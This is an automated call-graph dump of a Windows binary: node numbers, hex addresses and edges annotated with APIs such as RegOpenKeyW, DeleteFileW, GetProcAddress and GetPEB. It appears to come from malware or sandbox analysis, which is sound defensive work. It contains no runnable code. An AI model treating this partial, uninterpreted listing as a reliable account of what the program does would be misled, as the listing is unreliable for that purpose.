8310->8312 8311->8308 8313 409092 8312->8313 8323 409408 8312->8323 8315 4090a3 8313->8315 8318 402bab 2 API calls 8313->8318 8317 402bab 2 API calls 8317->8313 8318->8315 8320 413b31 8319->8320 8321 413b38 8319->8321 8322 404056 6 API calls 8320->8322 8321->8309 8322->8321 8324 409413 8323->8324 8325 40908c 8324->8325 8337 409d36 8324->8337 8325->8317 8336 40945c 8443 40a35d 8336->8443 8338 409d43 8337->8338 8339 40a35d 4 API calls 8338->8339 8340 409d55 8339->8340 8341 4031e5 4 API calls 8340->8341 8342 409d8b 8341->8342 8343 4031e5 4 API calls 8342->8343 8344 409dd0 8343->8344 8345 405b6f 6 API calls 8344->8345 8376 409423 8344->8376 8348 409df7 8345->8348 8346 409e1c 8347 4031e5 4 API calls 8346->8347 8346->8376 8349 409e62 8347->8349 8348->8346 8350 402bab 2 API calls 8348->8350 8351 4031e5 4 API calls 8349->8351 8350->8346 8352 409e82 8351->8352 8353 4031e5 4 API calls 8352->8353 8354 409ea2 8353->8354 8355 4031e5 4 API calls 8354->8355 8356 409ec2 8355->8356 8357 4031e5 4 API calls 8356->8357 8358 409ee2 8357->8358 8359 4031e5 4 API calls 8358->8359 8360 409f02 8359->8360 8361 4031e5 4 API calls 8360->8361 8362 409f22 8361->8362 8363 4031e5 4 API calls 8362->8363 8366 409f42 8363->8366 8364 40a19b 8365 408b2c 4 API calls 8364->8365 8365->8376 8366->8364 8367 409fa3 8366->8367 8368 405b6f 6 API calls 8367->8368 8367->8376 8369 409fbd 8368->8369 8370 40a02c 8369->8370 8371 402bab 2 API calls 8369->8371 8372 4031e5 4 API calls 8370->8372 8398 40a16d 8370->8398 8374 409fd7 8371->8374 8375 40a070 8372->8375 8373 402bab 2 API calls 8373->8376 8377 405b6f 6 API calls 8374->8377 8378 4031e5 4 API calls 8375->8378 8376->8336 8399 4056bf 8376->8399 8380 409fe5 8377->8380 8379 40a090 8378->8379 8381 4031e5 4 API calls 8379->8381 8380->8370 8382 402bab 2 API calls 8380->8382 8383 40a0b0 8381->8383 8384 409fff 8382->8384 8387 4031e5 4 API calls 8383->8387 8385 405b6f 6 API calls 8384->8385 8386 40a00d 8385->8386 8386->8370 8389 40a021 8386->8389 8388 40a0d0 8387->8388 8391 4031e5 4 API calls 8388->8391 8390 402bab 2 API calls 8389->8390 8390->8376 8392 40a0f0 8391->8392 8393 4031e5 4 API calls 8392->8393 8394 40a110 8393->8394 8395 4031e5 4 API calls 8394->8395 8396 40a134 8394->8396 8395->8396 8396->8398 8453 408b2c 8396->8453 8398->8373 8398->8376 8400 402b7c 2 API calls 8399->8400 8402 4056cd 8400->8402 8401 4056d4 8404 408c4d 8401->8404 8402->8401 8403 402b7c 2 API calls 8402->8403 8403->8401 8405 413ba4 6 API calls 8404->8405 8406 408c5c 8405->8406 8407 408f02 8406->8407 8408 408f3a 8406->8408 8411 40903e 8406->8411 8410 405b6f 6 API calls 8407->8410 8409 405b6f 6 API calls 8408->8409 8425 408f51 8409->8425 8412 408f0c 8410->8412 8427 413aca 8411->8427 8412->8411 8416 408f31 8412->8416 8456 40a1b6 8412->8456 8414 405b6f 6 API calls 8414->8425 8415 402bab 2 API calls 8415->8411 8416->8415 8418 409031 8419 402bab 2 API calls 8418->8419 8419->8416 8420 409022 8421 402bab 2 API calls 8420->8421 8422 409028 8421->8422 8423 402bab 2 API calls 8422->8423 8423->8416 8424 402bab GetProcessHeap RtlFreeHeap 8424->8425 8425->8411 8425->8414 8425->8416 8425->8418 8425->8420 8425->8424 8426 40a1b6 14 API calls 8425->8426 8490 4044ee 8425->8490 8426->8425 8428 409451 8427->8428 8429 413ad7 8427->8429 8437 405695 8428->8437 8430 405781 4 API calls 8429->8430 8431 413af0 8430->8431 8432 405781 4 API calls 8431->8432 8433 413afe 8432->8433 8434 405762 4 API calls 8433->8434 8435 413b0e 8434->8435 8435->8428 8436 405781 4 API calls 8435->8436 8436->8428 8438 4056a0 8437->8438 8439 4056b9 8437->8439 8440 402bab 2 API calls 8438->8440 8439->8336 8441 4056b3 8440->8441 8442 402bab 2 API calls 8441->8442 8442->8439 8444 40a39a 8443->8444 8448 40a368 8443->8448 8445 4031e5 4 API calls 8444->8445 8447 40a3af 8444->8447 8445->8447 8446 40a3ca 8450 40a38a 8446->8450 8452 408b2c 4 API calls 8446->8452 8447->8446 8449 408b2c 4 API calls 8447->8449 8451 4031e5 4 API calls 8448->8451 8449->8446 8450->8325 8451->8450 8452->8450 8454 4031e5 4 API calls 8453->8454 8455 408b3e 8454->8455 8455->8398 8457 40a202 8456->8457 8458 40a1c3 8456->8458 8612 405f08 8457->8612 8460 405b6f 6 API calls 8458->8460 8462 40a1d0 8460->8462 8461 40a1fc 8461->8416 8462->8461 8463 40a1f3 8462->8463 8500 40a45b 8462->8500 8468 402bab 2 API calls 8463->8468 8465 40a333 8467 402bab 2 API calls 8465->8467 8467->8461 8468->8461 8469 405b6f 6 API calls 8471 40a245 8469->8471 8470 40a25d 8472 405b6f 6 API calls 8470->8472 8471->8470 8473 413a58 13 API calls 8471->8473 8478 40a26b 8472->8478 8474 40a257 8473->8474 8477 402bab 2 API calls 8474->8477 8475 40a28b 8476 405b6f 6 API calls 8475->8476 8484 40a297 8476->8484 8477->8470 8478->8475 8479 40a284 8478->8479 8619 40955b 8478->8619 8482 402bab 2 API calls 8479->8482 8480 40a2b7 8480->8465 8483 405b6f 6 API calls 8480->8483 8489 402bab 2 API calls 8480->8489 8636 4098a7 8480->8636 8482->8475 8483->8480 8484->8480 8485 40a2b0 8484->8485 8626 40968e 8484->8626 8486 402bab 2 API calls 8485->8486 8486->8480 8489->8480 8491 402b7c 2 API calls 8490->8491 8492 404512 8491->8492 8494 404585 GetLastError 8492->8494 8495 402bab 2 API calls 8492->8495 8498 402b7c 2 API calls 8492->8498 8499 40457c 8492->8499 8891 4044a7 8492->8891 8496 404592 8494->8496 8494->8499 8495->8492 8497 402bab 2 API calls 8496->8497 8497->8499 8498->8492 8499->8425 8645 40642c 8500->8645 8502 40a469 8503 40c4ff 8502->8503 8648 4047e6 8502->8648 8503->8463 8506 4040bb 12 API calls 8507 40bf88 8506->8507 8507->8503 8508 403c90 8 API calls 8507->8508 8509 40bfaa 8508->8509 8510 402b7c 2 API calls 8509->8510 8512 40bfc1 8510->8512 8511 40c4f3 8513 403f9e 5 API calls 8511->8513 8514 40c3aa 8512->8514 8655 40a423 8512->8655 8513->8503 8514->8511 8517 4056bf 2 API calls 8514->8517 8520 40c4e3 8514->8520 8515 402bab 2 API calls 8515->8511 8519 40c3d2 8517->8519 8519->8520 8522 4040bb 12 API calls 8519->8522 8520->8515 8521 405f08 4 API calls 8523 40c005 8521->8523 8524 40c3f3 8522->8524 8525 40c021 8523->8525 8658 40a43f 8523->8658 8527 40c4d1 8524->8527 8715 405a52 8524->8715 8526 4031e5 4 API calls 8525->8526 8529 40c034 8526->8529 8532 413aca 4 API calls 8527->8532 8538 4031e5 4 API calls 8529->8538 8533 40c4dd 8532->8533 8536 405695 2 API calls 8533->8536 8534 40c411 8720 405a87 8534->8720 8535 402bab 2 API calls 8535->8525 8536->8520 8544 40c04d 8538->8544 8539 40c4b3 8540 402bab 2 API calls 8539->8540 8542 40c4cb 8540->8542 8541 405a52 4 API calls 8552 40c423 8541->8552 8543 403f9e 5 API calls 8542->8543 8543->8527 8546 4031e5 4 API calls 8544->8546 8545 405a87 4 API calls 8545->8552 8547 40c085 8546->8547 8549 4031e5 4 API calls 8547->8549 8548 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8548->8552 8550 40c09c 8549->8550 8553 4031e5 4 API calls 8550->8553 8551 402bab 2 API calls 8551->8552 8552->8539 8552->8541 8552->8545 8552->8548 8552->8551 8554 40c0b3 8553->8554 8555 4031e5 4 API calls 8554->8555 8556 40c0ca 8555->8556 8557 4031e5 4 API calls 8556->8557 8558 40c0e7 8557->8558 8559 4031e5 4 API calls 8558->8559 8560 40c100 8559->8560 8561 4031e5 4 API calls 8560->8561 8562 40c119 8561->8562 8563 4031e5 4 API calls 8562->8563 8564 40c132 8563->8564 8565 4031e5 4 API calls 8564->8565 8566 40c14b 8565->8566 8567 4031e5 4 API calls 8566->8567 8568 40c164 8567->8568 8569 4031e5 4 API calls 8568->8569 8570 40c17d 8569->8570 8571 4031e5 4 API calls 8570->8571 8572 40c196 8571->8572 8573 4031e5 4 API calls 8572->8573 8574 40c1af 8573->8574 8575 4031e5 4 API calls 8574->8575 8576 40c1c8 8575->8576 8577 4031e5 4 API calls 8576->8577 8578 40c1de 8577->8578 8579 4031e5 4 API calls 8578->8579 8580 40c1f4 8579->8580 8581 4031e5 4 API calls 8580->8581 8582 40c20d 8581->8582 8583 4031e5 4 API calls 8582->8583 8584 40c226 8583->8584 8585 4031e5 4 API calls 8584->8585 8586 40c23f 8585->8586 8587 4031e5 4 API calls 8586->8587 8588 40c258 8587->8588 8589 4031e5 4 API calls 8588->8589 8590 40c273 8589->8590 8591 4031e5 4 API calls 8590->8591 8592 40c28a 8591->8592 8593 4031e5 4 API calls 8592->8593 8596 40c2d5 8593->8596 8594 40c3a2 8595 402bab 2 API calls 8594->8595 8595->8514 8596->8594 8597 4031e5 4 API calls 8596->8597 8598 40c315 8597->8598 8599 40c38b 8598->8599 8661 404866 8598->8661 8600 403c40 5 API calls 8599->8600 8602 40c397 8600->8602 8604 403c40 5 API calls 8602->8604 8604->8594 8605 40c382 8607 403c40 5 API calls 8605->8607 8607->8599 8609 406c4c 6 API calls 8610 40c355 8609->8610 8610->8605 8685 4126a7 8610->8685 8613 4031e5 4 API calls 8612->8613 8614 405f1d 8613->8614 8615 405f55 8614->8615 8616 402b7c 2 API calls 8614->8616 8615->8461 8615->8465 8615->8469 8615->8470 8617 405f36 8616->8617 8617->8615 8618 4031e5 4 API calls 8617->8618 8618->8615 8620 409673 8619->8620 8625 40956d 8619->8625 8620->8479 8621 408b45 6 API calls 8621->8625 8622 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8622->8625 8623 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8623->8625 8624 402bab GetProcessHeap RtlFreeHeap 8624->8625 8625->8620 8625->8621 8625->8622 8625->8623 8625->8624 8627 4040bb 12 API calls 8626->8627 8634 4096a9 8627->8634 8628 40989f 8628->8485 8629 409896 8630 403f9e 5 API calls 8629->8630 8630->8628 8632 408b45 6 API calls 8632->8634 8633 402bab GetProcessHeap RtlFreeHeap 8633->8634 8634->8628 8634->8629 8634->8632 8634->8633 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8634->8635 8884 4059d8 8634->8884 8635->8634 8637 4040bb 12 API calls 8636->8637 8644 4098c1 8637->8644 8638 4099fb 8638->8480 8639 4099f3 8640 403f9e 5 API calls 8639->8640 8640->8638 8641 402bab GetProcessHeap RtlFreeHeap 8641->8644 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8643->8644 8644->8638 8644->8639 8644->8641 8644->8642 8644->8643 8646 4031e5 4 API calls 8645->8646 8647 406441 GetNativeSystemInfo 8646->8647 8647->8502 8649 4031e5 4 API calls 8648->8649 8652 40480a 8649->8652 8650 40485d 8650->8503 8650->8506 8651 4031e5 4 API calls 8651->8652 8652->8650 8652->8651 8653 40484f 8652->8653 8654 403c40 5 API calls 8653->8654 8654->8650 8656 4031e5 4 API calls 8655->8656 8657 40a435 8656->8657 8657->8521 8659 4031e5 4 API calls 8658->8659 8660 40a451 8659->8660 8660->8535 8662 4031e5 4 API calls 8661->8662 8663 40487c 8662->8663 8663->8605 8664 406c4c 8663->8664 8725 4068eb 8664->8725 8666 406e02 8666->8609 8667 406cab 8737 40469b 8667->8737 8668 406c6c 8668->8666 8668->8667 8734 406894 8668->8734 8675 406df1 8676 40469b 4 API calls 8675->8676 8676->8666 8677 406cef 8677->8675 8678 4031e5 4 API calls 8677->8678 8679 406d26 8678->8679 8679->8675 8680 40771e 6 API calls 8679->8680 8684 406d57 8680->8684 8681 406da2 8682 4031e5 4 API calls 8681->8682 8682->8675 8684->8681 8750 4068b0 8684->8750 8686 4126bb 8685->8686 8687 4126d1 8685->8687 8689 412840 8686->8689 8806 40488c 8686->8806 8687->8689 8812 407055 8687->8812 8689->8605 8692 412837 8694 403c40 5 API calls 8692->8694 8694->8689 8696 41281e 8697 4070ff 6 API calls 8696->8697 8697->8692 8698 407055 6 API calls 8699 412742 8698->8699 8699->8696 8700 40719a 6 API calls 8699->8700 8701 41276e 8700->8701 8702 412804 8701->8702 8828 406f4a 8701->8828 8856 4070ff 8702->8856 8705 41279a 8834 412553 8705->8834 8878 405907 8715->8878 8717 405a61 8718 405a76 8717->8718 8719 405907 4 API calls 8717->8719 8718->8534 8719->8717 8721 402b7c 2 API calls 8720->8721 8722 405a99 8721->8722 8724 405ade 8722->8724 8881 40595e 8722->8881 8724->8552 8753 4076a8 8725->8753 8727 406913 8728 406a61 8727->8728 8729 40771e 6 API calls 8727->8729 8728->8668 8730 406949 8729->8730 8730->8728 8731 40771e 6 API calls 8730->8731 8732 404678 4 API calls 8730->8732 8759 4046c2 8730->8759 8731->8730 8732->8730 8735 4031e5 4 API calls 8734->8735 8736 4068a6 8735->8736 8736->8668 8738 4046b4 8737->8738 8739 4046a4 8737->8739 8738->8666 8741 404678 8738->8741 8740 4031e5 4 API calls 8739->8740 8740->8738 8742 4031e5 4 API calls 8741->8742 8743 40468b 8742->8743 8743->8666 8744 40771e 8743->8744 8745 407737 8744->8745 8749 407748 8744->8749 8746 407644 6 API calls 8745->8746 8747 407741 8746->8747 8748 406baa 6 API calls 8747->8748 8748->8749 8749->8677 8751 4031e5 4 API calls 8750->8751 8752 4068c2 8751->8752 8752->8684 8754 4076c1 8753->8754 8755 4076d2 8753->8755 8767 407644 8754->8767 8755->8727 8760 4046d3 8759->8760 8761 4046d9 8759->8761 8802 40464c 8760->8802 8763 404678 4 API calls 8761->8763 8766 4046e9 8761->8766 8763->8766 8764 404714 8764->8730 8765 40469b 4 API calls 8765->8764 8766->8764 8766->8765 8768 407653 8767->8768 8769 407661 8767->8769 8768->8769 8775 406a6b 8768->8775 8771 406baa 8769->8771 8772 406bbb 8771->8772 8774 406bc8 8771->8774 8772->8774 8783 407402 8772->8783 8774->8755 8779 406a81 8775->8779 8776 402b7c 2 API calls 8776->8779 8777 406b8b 8777->8769 8778 406894 4 API calls 8778->8779 8779->8776 8779->8777 8779->8778 8780 406b96 8779->8780 8781 402bab 2 API calls 8779->8781 8782 402bab 2 API calls 8780->8782 8781->8779 8782->8777 8784 407644 6 API calls 8783->8784 8785 407412 8784->8785 8786 402b7c 2 API calls 8785->8786 8793 407450 8785->8793 8787 407483 8786->8787 8788 402b7c 2 API calls 8787->8788 8787->8793 8790 4074ce 8788->8790 8789 4074da 8791 4068cc 2 API calls 8789->8791 8790->8789 8792 402b7c 2 API calls 8790->8792 8791->8793 8796 40751f 8792->8796 8793->8774 8794 40752b 8795 4068cc 2 API calls 8794->8795 8795->8789 8796->8794 8798 4068cc 8796->8798 8799 4068d6 8798->8799 8800 4068e3 8798->8800 8799->8800 8801 402bab GetProcessHeap RtlFreeHeap 8799->8801 8800->8794 8801->8800 8803 404666 8802->8803 8804 404659 8802->8804 8803->8761 8805 4031e5 4 API calls 8804->8805 8805->8803 8807 4047e6 5 API calls 8806->8807 8808 404897 8807->8808 8809 40489c 8808->8809 8864 4047c7 8808->8864 8809->8687 8813 40706f 8812->8813 8814 407084 8812->8814 8813->8814 8815 407644 6 API calls 8813->8815 8819 4070e4 8814->8819 8867 406fd2 8814->8867 8816 40707d 8815->8816 8818 406baa 6 API calls 8816->8818 8818->8814 8819->8692 8820 40719a 8819->8820 8821 4071b0 8820->8821 8825 4071c5 8820->8825 8822 407644 6 API calls 8821->8822 8821->8825 8823 4071be 8822->8823 8824 406baa 6 API calls 8823->8824 8824->8825 8826 406fd2 4 API calls 8825->8826 8827 407226 8825->8827 8826->8827 8827->8696 8827->8698 8829 406f64 8828->8829 8833 406f75 8828->8833 8830 407644 6 API calls 8829->8830 8831 406f6e 8830->8831 8832 406baa 6 API calls 8831->8832 8832->8833 8833->8705 8875 4060ac 8834->8875 8857 407116 8856->8857 8858 40712b 8856->8858 8857->8858 8859 407644 6 API calls 8857->8859 8861 406fd2 4 API calls 8858->8861 8863 407187 8858->8863 8860 407124 8859->8860 8862 406baa 6 API calls 8860->8862 8861->8863 8862->8858 8863->8696 8865 4031e5 4 API calls 8864->8865 8866 4047d9 8865->8866 8866->8687 8868 406fde 8867->8868 8869 407027 8868->8869 8870 4031e5 4 API calls 8868->8870 8869->8819 8871 406ffa 8870->8871 8872 4031e5 4 API calls 8871->8872 8873 407011 8872->8873 8874 4031e5 4 API calls 8873->8874 8874->8869 8876 4031e5 4 API calls 8875->8876 8877 4060bb 8876->8877 8877->8877 8879 4031e5 4 API calls 8878->8879 8880 40591a 8879->8880 8880->8717 8882 4031e5 4 API calls 8881->8882 8883 405971 8882->8883 8883->8722 8885 4031e5 4 API calls 8884->8885 8886 4059ed 8885->8886 8887 402b7c 2 API calls 8886->8887 8890 405a38 8886->8890 8888 405a16 8887->8888 8889 4031e5 4 API calls 8888->8889 8888->8890 8889->8890 8890->8634 8892 4031e5 4 API calls 8891->8892 8893 4044b9 8892->8893 8893->8492 9813 40a349 9814 4098a7 13 API calls 9813->9814 9815 40a359 9814->9815 9052 408952 9073 40823f 9052->9073 9055 408960 9057 4056bf 2 API calls 9055->9057 9058 40896a 9057->9058 9101 408862 9058->9101 9060 413aca 4 API calls 9061 4089d4 9060->9061 9063 405695 2 API calls 9061->9063 9062 408975 9070 4089c4 9062->9070 9109 4087d6 9062->9109 9065 4089df 9063->9065 9070->9060 9071 402bab 2 API calls 9072 40899d 9071->9072 9072->9070 9072->9071 9074 40824d 9073->9074 9075 40831b 9074->9075 9076 4031e5 4 API calls 9074->9076 9075->9055 9089 4083bb 9075->9089 9077 40826d 9076->9077 9078 4031e5 4 API calls 9077->9078 9079 408289 9078->9079 9080 4031e5 4 API calls 9079->9080 9081 4082a5 9080->9081 9082 4031e5 4 API calls 9081->9082 9083 4082c1 9082->9083 9084 4031e5 4 API calls 9083->9084 9085 4082e2 9084->9085 9086 4031e5 4 API calls 9085->9086 9087 4082ff 9086->9087 9088 4031e5 4 API calls 9087->9088 9088->9075 9137 408363 9089->9137 9092 4056bf 2 API calls 9098 4083f4 9092->9098 9093 413aca 4 API calls 9094 4084a0 9093->9094 9095 405695 2 API calls 9094->9095 9096 4084ab 9095->9096 9096->9055 9097 408492 9097->9093 9098->9097 9140 40815d 9098->9140 9155 40805d 9098->9155 9170 404b8f 9101->9170 9103 408946 9103->9062 9104 40887e 9104->9103 9105 4031e5 4 API calls 9104->9105 9106 40893e 9104->9106 9108 402b7c 2 API calls 9104->9108 9105->9104 9173 404a39 9106->9173 9108->9104 9110 402b7c 2 API calls 9109->9110 9111 4087e7 9110->9111 9112 4031e5 4 API calls 9111->9112 9117 40885a 9111->9117 9115 408802 9112->9115 9113 408853 9114 402bab 2 API calls 9113->9114 9114->9117 9115->9113 9118 40884d 9115->9118 9182 408522 9115->9182 9186 4084b4 9115->9186 9121 408749 9117->9121 9189 4084d4 9118->9189 9122 404b8f 5 API calls 9121->9122 9127 408765 9122->9127 9123 4087cf 9129 4085d1 9123->9129 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9123 9127->9124 9127->9125 9127->9126 9128->9123 9130 4086c2 9129->9130 9131 4085e9 9129->9131 9130->9072 9131->9130 9133 402bab 2 API calls 9131->9133 9134 4031e5 4 API calls 9131->9134 9195 4089e6 9131->9195 9214 4086c9 9131->9214 9218 4036a3 9131->9218 9133->9131 9134->9131 9138 4031e5 4 API calls 9137->9138 9139 408386 9138->9139 9139->9092 9139->9096 9141 40816f 9140->9141 9142 4081b6 9141->9142 9143 4081fd 9141->9143 9154 4081ef 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 408213 9144->9146 9147 4081cf 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9151 408222 9148->9151 9150 4081df 9149->9150 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9098 9156 40808c 9155->9156 9157 4080d2 9156->9157 9158 408119 9156->9158 9169 40810b 9156->9169 9160 405872 4 API calls 9157->9160 9159 405872 4 API calls 9158->9159 9161 40812f 9159->9161 9162 4080eb 9160->9162 9164 405872 4 API calls 9161->9164 9163 405872 4 API calls 9162->9163 9165 4080fb 9163->9165 9166 40813e 9164->9166 9167 405872 4 API calls 9165->9167 9168 405872 4 API calls 9166->9168 9167->9169 9168->9169 9169->9098 9176 404a19 9170->9176 9172 404ba0 9172->9104 9179 4049ff 9173->9179 9175 404a44 9175->9103 9177 4031e5 4 API calls 9176->9177 9178 404a2c RegOpenKeyW 9177->9178 9178->9172 9180 4031e5 4 API calls 9179->9180 9181 404a12 RegCloseKey 9180->9181 9181->9175 9184 408534 9182->9184 9183 4085af 9183->9115 9184->9183 9192 4084ee 9184->9192 9187 4031e5 4 API calls 9186->9187 9188 4084c7 9187->9188 9188->9115 9190 4031e5 4 API calls 9189->9190 9191 4084e7 9190->9191 9191->9113 9193 4031e5 4 API calls 9192->9193 9194 408501 9193->9194 9194->9183 9196 4031e5 4 API calls 9195->9196 9197 408a06 9196->9197 9198 408b21 9197->9198 9199 4031e5 4 API calls 9197->9199 9198->9131 9202 408a32 9199->9202 9200 408b17 9230 403649 9200->9230 9202->9200 9221 403666 9202->9221 9205 4031e5 4 API calls 9207 408a88 9205->9207 9208 4031e5 4 API calls 9207->9208 9213 408b0e 9207->9213 9209 408ac4 9208->9209 9210 405b6f 6 API calls 9209->9210 9211 408aff 9210->9211 9211->9213 9224 408508 9211->9224 9227 40362f 9213->9227 9215 408744 9214->9215 9216 4086e2 9214->9216 9215->9131 9216->9215 9217 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9216->9217 9217->9216 9219 4031e5 4 API calls 9218->9219 9220 4036b5 9219->9220 9220->9131 9222 4031e5 4 API calls 9221->9222 9223 403679 9222->9223 9223->9205 9223->9213 9225 4031e5 4 API calls 9224->9225 9226 40851b 9225->9226 9226->9213 9228 4031e5 4 API calls 9227->9228 9229 403642 9228->9229 9229->9200 9231 4031e5 4 API calls 9230->9231 9232 40365c 9231->9232 9232->9198 9833 40f252 9834 404bee 6 API calls 9833->9834 9835 40f269 9834->9835 9836 404bee 6 API calls 9835->9836 9847 40f2ff 9835->9847 9837 40f282 9836->9837 9838 404bee 6 API calls 9837->9838 9839 40f290 9838->9839 9850 404c4e 9839->9850 9841 40f2a7 9842 405872 4 API calls 9841->9842 9841->9847 9843 40f2cd 9842->9843 9844 405872 4 API calls 9843->9844 9845 40f2dc 9844->9845 9846 405872 4 API calls 9845->9846 9848 40f2ee 9846->9848 9849 405762 4 API calls 9848->9849 9849->9847 9851 402b7c 2 API calls 9850->9851 9853 404c60 9851->9853 9852 404ca4 9852->9841 9853->9852 9854 4031e5 4 API calls 9853->9854 9855 404c8d 9854->9855 9855->9852 9856 402bab 2 API calls 9855->9856 9856->9852 9857 41045c 9858 4040bb 12 API calls 9857->9858 9859 410477 9858->9859 9860 41060b 9859->9860 9888 407851 9859->9888 9862 41048f 9864 407851 2 API calls 9862->9864 9868 410604 9862->9868 9863 403f9e 5 API calls 9863->9860 9865 4104a9 9864->9865 9870 4105e0 9865->9870 9871 405ae9 6 API calls 9865->9871 9873 41056f 9865->9873 9874 4105eb 9865->9874 9866 402bab 2 API calls 9866->9868 9867 402bab 2 API calls 9869 4105fb 9867->9869 9868->9863 9869->9866 9872 402bab 2 API calls 9870->9872 9870->9874 9871->9865 9872->9874 9873->9870 9875 4105d6 9873->9875 9877 412269 6 API calls 9873->9877 9874->9867 9874->9869 9876 402bab 2 API calls 9875->9876 9876->9870 9878 410580 9877->9878 9878->9875 9879 405872 4 API calls 9878->9879 9880 410599 9879->9880 9881 405872 4 API calls 9880->9881 9882 4105a9 9881->9882 9883 405872 4 API calls 9882->9883 9884 4105bb 9883->9884 9885 405872 4 API calls 9884->9885 9886 4105cd 9885->9886 9887 402bab 2 API calls 9886->9887 9887->9875 9889 407866 9888->9889 9890 402b7c 2 API calls 9889->9890 9891 407899 9889->9891 9890->9891 9891->9862 9294 40f561 9297 40f4b6 9294->9297 9298 413b28 6 API calls 9297->9298 9299 40f4bf 9298->9299 9300 405b6f 6 API calls 9299->9300 9301 402bab GetProcessHeap RtlFreeHeap 9299->9301 9302 413a58 13 API calls 9299->9302 9303 40f559 9299->9303 9300->9299 9301->9299 9302->9299 9307 403b64 9308 4031e5 4 API calls 9307->9308 9309 403b77 PathFileExistsW 9308->9309 9923 40d069 9924 404bee 6 API calls 9923->9924 9925 40d080 9924->9925 9926 404bee 6 API calls 9925->9926 9948 40d1e2 9925->9948 9927 40d099 9926->9927 9928 404bee 6 API calls 9927->9928 9929 40d0a7 9928->9929 9964 404ba7 9929->9964 9932 404bee 6 API calls 9933 40d0c5 9932->9933 9934 404c4e 6 API calls 9933->9934 9935 40d0dc 9934->9935 9936 404bee 6 API calls 9935->9936 9937 40d0eb 9936->9937 9938 404ba7 4 API calls 9937->9938 9939 40d0fa 9938->9939 9940 404bee 6 API calls 9939->9940 9941 40d109 9940->9941 9942 404c4e 6 API calls 9941->9942 9943 40d123 9942->9943 9944 405872 4 API calls 9943->9944 9943->9948 9945 40d14a 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d159 9946->9947 9949 405872 4 API calls 9947->9949 9950 40d16b 9949->9950 9951 405781 4 API calls 9950->9951 9952 40d179 9951->9952 9953 405872 4 API calls 9952->9953 9954 40d18b 9953->9954 9955 405762 4 API calls 9954->9955 9956 40d19f 9955->9956 9957 405872 4 API calls 9956->9957 9958 40d1b1 9957->9958 9959 405781 4 API calls 9958->9959 9960 40d1bf 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d1d1 9961->9962 9963 405762 4 API calls 9962->9963 9963->9948 9965 4031e5 4 API calls 9964->9965 9966 404bca 9965->9966 9966->9932 9336 40f16e 9337 4056bf 2 API calls 9336->9337 9338 40f17b 9337->9338 9339 412093 20 API calls 9338->9339 9340 40f19e 9339->9340 9341 412093 20 API calls 9340->9341 9342 40f1b6 9341->9342 9343 412093 20 API calls 9342->9343 9344 40f1cc 9343->9344 9345 412093 20 API calls 9344->9345 9346 40f1e2 9345->9346 9347 413aca 4 API calls 9346->9347 9348 40f1ef 9347->9348 9349 405695 2 API calls 9348->9349 9350 40f1fa 9349->9350 9351 40ce71 9352 413b28 6 API calls 9351->9352 9353 40ce78 9352->9353 9354 405b6f 6 API calls 9353->9354 9355 40ce83 9354->9355 9359 40ceba 9355->9359 9362 403d74 19 API calls 9355->9362 9363 40cec1 9355->9363 9356 403fbf 7 API calls 9357 40cecc 9356->9357 9358 40cefb 9357->9358 9361 403d74 19 API calls 9357->9361 9360 402bab 2 API calls 9359->9360 9360->9363 9364 40cee7 9361->9364 9365 40cead 9362->9365 9363->9356 9366 40cef4 9364->9366 9369 402bab 2 API calls 9364->9369 9365->9359 9368 402bab 2 API calls 9365->9368 9367 402bab 2 API calls 9366->9367 9367->9358 9368->9359 9369->9366 9370 406472 9371 4031e5 4 API calls 9370->9371 9372 406484 Sleep 9371->9372 10040 40f204 10041 405781 4 API calls 10040->10041 10042 40f214 10041->10042 10043 4057df 13 API calls 10042->10043 10044 40f226 10043->10044 9430 403c08 9431 4031e5 4 API calls 9430->9431 9432 403c1a DeleteFileW 9431->9432 9433 410a09 9434 41219c 14 API calls 9433->9434 9435 410a1b 9434->9435 9436 41219c 14 API calls 9435->9436 9437 410a23 9436->9437 9438 41219c 14 API calls 9437->9438 9439 410a2c 9438->9439 9440 41219c 14 API calls 9439->9440 9441 410a38 9440->9441 9442 404b22 6 API calls 9441->9442 9443 410a4c 9442->9443 9444 403fbf 7 API calls 9443->9444 9450 410a7a 9443->9450 9445 410a5c 9444->9445 9446 410a71 9445->9446 9447 413a58 13 API calls 9445->9447 9448 402bab 2 API calls 9446->9448 9449 410a6b 9447->9449 9448->9450 9451 402bab 2 API calls 9449->9451 9451->9446 10045 410d09 10046 410d56 10045->10046 10047 410d17 10045->10047 10049 413a58 13 API calls 10046->10049 10061 406642 10047->10061 10051 410d6f 10049->10051 10052 4056bf 2 API calls 10053 410d2e 10052->10053 10074 405641 10053->10074 10055 410d41 10056 413aca 4 API calls 10055->10056 10057 410d4a 10056->10057 10058 405695 2 API calls 10057->10058 10059 410d50 10058->10059 10060 4036a3 4 API calls 10059->10060 10060->10046 10062 406662 10061->10062 10063 4031e5 4 API calls 10062->10063 10064 406676 10063->10064 10078 4066bf 10064->10078 10069 4066b1 10072 4036a3 4 API calls 10069->10072 10070 4066a7 10071 4036a3 4 API calls 10070->10071 10073 4066ac 10071->10073 10072->10073 10073->10046 10073->10052 10075 40564d 10074->10075 10076 405673 10074->10076 10075->10076 10077 4056fc 4 API calls 10075->10077 10076->10055 10077->10076 10079 4031e5 4 API calls 10078->10079 10080 4066dc 10079->10080 10081 4066f6 SetLastError 10080->10081 10082 406708 GetLastError 10080->10082 10099 406693 10081->10099 10083 406713 10082->10083 10082->10099 10084 4031e5 4 API calls 10083->10084 10085 406725 10084->10085 10086 4031e5 4 API calls 10085->10086 10085->10099 10087 40673f 10086->10087 10088 406753 10087->10088 10089 406749 10087->10089 10091 4031e5 4 API calls 10088->10091 10090 4036a3 4 API calls 10089->10090 